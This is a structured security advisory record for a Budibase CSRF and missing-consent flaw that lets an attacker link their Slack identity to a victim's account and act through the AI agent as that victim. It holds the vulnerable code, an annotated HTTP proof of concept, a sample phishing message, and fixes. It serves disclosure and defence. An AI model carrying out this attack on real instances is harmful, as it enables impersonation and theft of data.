{"id":"CVE-2026-50132","title":"Budibase has an Account Impersonation Issue — Chat Identity Link Hijacking via Missing Consent & CSRF","summary":"Budibase has an Account Impersonation Issue — Chat Identity Link Hijacking via Missing Consent & CSRF","severity":"high","cvss":7.3,"cwe":["CWE-284","CWE-352"],"vendor":"budibase","product":"@budibase/server","ecosystem":"npm","affected":["@budibase/server < 3.39.0"],"patched":["@budibase/server 3.39.0"],"published":"2026-06-22","updated":"2026-06-22","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-v7j5-vc4m-723w","references":[{"url":"https://github.com/Budibase/budibase/security/advisories/GHSA-v7j5-vc4m-723w"},{"url":"https://github.com/Budibase/budibase/pull/18793"},{"url":"https://github.com/Budibase/budibase/commit/cf66fb45d27402bace312d85616ddd4257f3a5aa"},{"url":"https://github.com/advisories/GHSA-v7j5-vc4m-723w"}],"tags":["ghsa","npm"],"epss":0.00192,"epssPercentile":0.0912,"ingestedAt":"2026-06-29T13:24:35.491Z","slug":"CVE-2026-50132","body":"## Overview\n\n## Title\n\n**Chat Identity Link Hijacking — Attacker Can Silently Map Their Slack/Discord Identity to Any Authenticated Budibase User's Account**\n\n## Severity\n\n**High** — CVSS 3.1: AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N = **7.3**\n\n## Affected Product\n\n- **Product:** Budibase\n- **Version:** 3.37.2 (introduced in this version)\n- **Component:** `packages/server/src/api/controllers/ai/chatIdentityLinks.ts`\n- **Endpoint:** `GET /api/chat-links/:instance/:token/handoff`\n\n\n## Vulnerability Type\n\n- CWE-352: Cross-Site Request Forgery\n- CWE-284: Improper Access Control\n\n---\n\n## Vulnerability Description\n\n`GET /api/chat-links/:instance/:token/handoff` is a **public endpoint** (no auth required) that performs a permanent, state-changing operation: it binds an external chat identity (Slack/Discord/MS Teams) to an authenticated Budibase user account, with **no consent UI and no CSRF protection**.\n\nThe session token in the URL is created **by the attacker** (from their own `/link` slash command) and embeds **the attacker's `externalUserId`**. When an authenticated Budibase victim visits the URL, their account is silently and permanently linked to the attacker's Slack/Discord identity. The server responds with `\"Authentication succeeded.\"` — no indication of what was linked.\n\n### Route Registration\n\n```typescript\n// packages/server/src/api/routes/chat.ts:22\nrouter.get(\n  \"/api/chat-links/:instance/:token/handoff\",\n  controller.handoffChatLinkSession   // registered in publicRoutes — zero auth middleware\n)\n```\n\n### Vulnerable Controller (full function)\n\n```typescript\n// packages/server/src/api/controllers/ai/chatIdentityLinks.ts:61–110\nexport async function handoffChatLinkSession(\n  ctx: UserCtx<void, string, { instance: string; token: string }>\n) {\n  const token = resolveToken(ctx.params.token)\n  const session = await sdk.ai.chatIdentityLinks.getChatIdentityLinkSession(token)\n  if (!session) {\n    throw new HTTPError(\"Link token is invalid or has expired\", 400)\n  }\n  assertSessionMatchesInstance({ workspaceId: session.workspaceId, instance: ctx.params.instance })\n\n  if (!ctx.isAuthenticated) {\n    // Unauthenticated: set return URL cookie, redirect to login\n    // After login, same URL is visited again → attack completes silently\n    utils.setCookie(ctx,\n      `/api/chat-links/${ctx.params.instance}/${token}/handoff`,\n      \"budibase:returnurl\",\n      { sign: false }  // ← unsigned cookie, but not an open redirect\n    )\n    ctx.redirect(\"/builder/auth/login\")\n    return\n  }\n\n  const currentGlobalUserId = getCurrentGlobalUserId(ctx)\n  const consumedSession = await sdk.ai.chatIdentityLinks.consumeChatIdentityLinkSession(token)\n\n  // ↓↓↓ THE VULNERABLE WRITE — no consent check, no CSRF token ↓↓↓\n  await sdk.ai.chatIdentityLinks.upsertChatIdentityLink({\n    provider: consumedSession.provider,\n    externalUserId: consumedSession.externalUserId,  // ← ATTACKER's Slack ID\n    externalUserName: consumedSession.externalUserName,\n    teamId: consumedSession.teamId,\n    globalUserId: currentGlobalUserId,   // ← VICTIM's Budibase user ID\n    linkedBy: currentGlobalUserId,\n  })\n\n  ctx.type = \"text/html\"\n  ctx.body = renderLinkSuccessPage()  // ← \"Authentication succeeded.\" — no disclosure to user\n}\n```\n\n---\n\n## Proof of Concept — Annotated HTTP Trace\n\n### Setup\n\n| Role | Identity |\n|---|---|\n| Attacker | Slack user `U_ATTACKER` (e.g. `UA12345678`), Budibase tenant `acme`, workspace ID `ws_abc123` |\n| Victim | Budibase admin, session cookie `budibase:session=VICTIM_SESSION` |\n\n---\n\n### Step 1 — Attacker triggers `/link` in Slack\n\nAttacker types `/link` to the Budibase Slack bot. Budibase server creates a Redis session:\n\n**Redis key:** `chatIdentityLinkSession:tok_xxxxxxxxxxxxxxxx`\n\n**Redis value (exact structure from `ChatIdentityLinkSession` interface):**\n```json\n{\n  \"token\": \"tok_xxxxxxxxxxxxxxxx\",\n  \"tenantId\": \"acme\",\n  \"workspaceId\": \"ws_abc123\",\n  \"provider\": \"slack\",\n  \"externalUserId\": \"UA12345678\",\n  \"externalUserName\": \"attacker\",\n  \"teamId\": \"T_ACME_SLACK\",\n  \"createdAt\": \"2026-05-02T10:00:00.000Z\",\n  \"expiresAt\": \"2026-05-02T10:10:00.000Z\"\n}\n```\n\nSlack DM sent privately to attacker:\n```\nLink your Slack account to continue chatting with this agent.\nhttps://budibase.company.com/api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff\n```\n\n**Key observation:** This URL embeds the attacker's own `externalUserId` inside the token. The attacker has full control over which identity gets linked.\n\n---\n\n### Step 2 — Attacker forwards URL to victim\n\nAttacker posts in the company Slack:\n```\n@admin please click this to connect your Budibase account for AI agent access:\nhttps://budibase.company.com/api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff\n```\n\n---\n\n### Step 3 — Victim clicks link (authenticated)\n\n**HTTP Request (victim's browser):**\n```http\nGET /api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff HTTP/1.1\nHost: budibase.company.com\nCookie: budibase:session=VICTIM_SESSION\n```\n\n**HTTP Response:**\n```http\nHTTP/1.1 200 OK\nContent-Type: text/html\n\n<!doctype html>\n<html lang=\"en\">\n  <head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <title>Authentication succeeded</title>\n  </head>\n  <body>\n    <p>Authentication succeeded.</p>\n    <script>\n      if (window.opener && !window.opener.closed) {\n        try { window.opener.focus(); window.close() } catch (error) {}\n      }\n    </script>\n  </body>\n</html>\n```\n\nThe victim sees \"Authentication succeeded.\" with no mention of Slack, no mention of `attacker`, no mention of what capabilities were granted.\n\n**CouchDB global-db document written immediately after (exact structure from `upsertChatIdentityLink`):**\n\n```json\n{\n  \"_id\": \"chatidentitylink_acme_slack_T_ACME_SLACK_UA12345678\",\n  \"tenantId\": \"acme\",\n  \"provider\": \"slack\",\n  \"externalUserId\": \"UA12345678\",\n  \"globalUserId\": \"ro_global_us_VICTIM_ADMIN_ID\",\n  \"linkedAt\": \"2026-05-02T10:00:42.000Z\",\n  \"linkedBy\": \"ro_global_us_VICTIM_ADMIN_ID\",\n  \"externalUserName\": \"attacker\",\n  \"teamId\": \"T_ACME_SLACK\",\n  \"createdAt\": \"2026-05-02T10:00:42.000Z\",\n  \"updatedAt\": \"2026-05-02T10:00:42.000Z\"\n}\n```\n\nThe mapping is now permanent. `externalUserId = UA12345678` (attacker) → `globalUserId = ro_global_us_VICTIM_ADMIN_ID` (victim).\n\n---\n\n### Step 4 — Attacker impersonates victim via AI agent\n\nAttacker sends any message to the Budibase Slack bot from their own account (`UA12345678`).\n\nThe chat handler resolves the identity:\n\n```typescript\n// packages/server/src/api/controllers/webhook/chatHandler.ts:421\nconst existingLink = await sdk.ai.chatIdentityLinks.getChatIdentityLink({\n  provider: AgentChannelProvider.SLACK,\n  externalUserId: \"UA12345678\",     // ← attacker's Slack ID\n  teamId: \"T_ACME_SLACK\",\n})\n// existingLink.globalUserId = \"ro_global_us_VICTIM_ADMIN_ID\"\n\nconst linkedUser = await getGlobalUser(\"ro_global_us_VICTIM_ADMIN_ID\")\n// All agent tool calls now execute with victim admin's permissions\n```\n\nThe attacker can now ask the agent:\n\n> \"Show me all rows in the Customers table\"\n> \"Trigger the 'Send Invoice' automation for customer ID 42\"\n> \"What files are in the knowledge base?\"\n\nEach request runs with the victim admin's identity and permissions. The victim has no indication this is happening.\n\n---\n\n### Step 3b — Variant: Victim Not Yet Authenticated\n\nIf the victim is not currently logged in when they click the URL:\n\n**HTTP Request:**\n```http\nGET /api/chat-links/ws_abc123/tok_xxxxxxxxxxxxxxxx/handoff HTTP/1.1\nHost: budibase.company.com\n```\n\n**HTTP Response:**\n```http\nHTTP/1.1 302 Found\nLocation: /builder/auth/login\nSet-Cookie: budibase:returnurl=%2Fapi%2Fchat-links%2Fws_abc123%2Ftok_xxxxxxxxxxxxxxxx%2Fhandoff; Path=/\n```\n\nAfter the victim logs in, the browser follows the return URL and the attack completes identically to Step 3.\n\n---\n\n## Impact\n\n| Dimension | Detail |\n|---|---|\n| Confidentiality | **High** — attacker reads all table rows, files, and knowledge base data accessible to victim |\n| Integrity | **High** — attacker writes rows and triggers automations (email, external API calls, record creation) as victim |\n| Availability | None |\n| Auth required | **Low** — attacker only needs a Slack/Discord account in the same workspace as the Budibase bot |\n| User interaction | **Required** — victim clicks one link (trivial social engineering in any enterprise Slack) |\n| Scope | Unchanged — impact is within the victim's Budibase tenant |\n| Persistence | **Permanent** — the link document persists in CouchDB until explicitly deleted; re-exploitation survives token rotation |\n\n---\n\n## Why Severity Is High (Not Medium)\n\nThe social engineering bar is near zero in enterprise Slack:\n- The link looks like a legitimate Budibase URL on the company domain\n- The message pattern (\"link your account for AI agent access\") matches the product's own UX\n- A victim who clicks and sees \"Authentication succeeded.\" has no reason to be suspicious\n- The effect is **permanent and silent** — the victim never learns their account was linked\n\nCombined with admin-level access to all application data and automation triggers, this meets the bar for High.\n\n---\n\n## Remediation\n\n### Minimum Fix — Add Consent Page\n\nConvert the handoff to a two-step flow:\n\n```\nGET  /api/chat-links/:instance/:token/handoff\n  → Show consent page: \"You are linking your Budibase account to\n    [externalUserName]'s Slack identity ([provider]).\n    This allows them to interact with AI agents as you. [Confirm] [Cancel]\"\n\nPOST /api/chat-links/:instance/:token/handoff  (with CSRF token)\n  → Perform the upsertChatIdentityLink() write\n```\n\nMoving the write to `POST` removes it from `publicRoutes`, making Budibase's existing CSRF middleware apply automatically.\n\n### Additional Hardening\n\n- Show the `externalUserName` and provider on the consent page\n- Log the event to the audit trail (both identities, timestamp, IP)\n- Optionally restrict linking to users with explicit permission (not all roles)\n\n---\nCredits,\nVishal Kumar B\nhttps://github.com/VishaaLlKumaaRr\n\n## References\n\n- `packages/server/src/api/routes/chat.ts:22` — public route registration\n- `packages/server/src/api/controllers/ai/chatIdentityLinks.ts:61–110` — full vulnerable controller\n- `packages/server/src/sdk/workspace/ai/chatIdentityLinks.ts:135–165` — session creation (embeds attacker's externalUserId)\n- `packages/server/src/sdk/workspace/ai/chatIdentityLinks.ts:202–247` — upsertChatIdentityLink (permanent write)\n- `packages/server/src/api/controllers/webhook/chatHandler.ts:421` — identity resolution during agent message handling\n- `packages/server/src/ai/tools/budibase/automations.ts` — automation trigger capability\n- `packages/server/src/ai/tools/budibase/rows.ts` — row read/write capability\n- `packages/types/src/sdk/chatIdentityLinks.ts` — session + link type definitions\n- CWE-352: Cross-Site Request Forgery\n- CWE-284: Improper Access Control\n\n## Affected packages\n\n- `@budibase/server < 3.39.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `@budibase/server 3.39.0`","depth":"twilight","depthScore":40,"depthScoreParts":{"impact":40.2,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}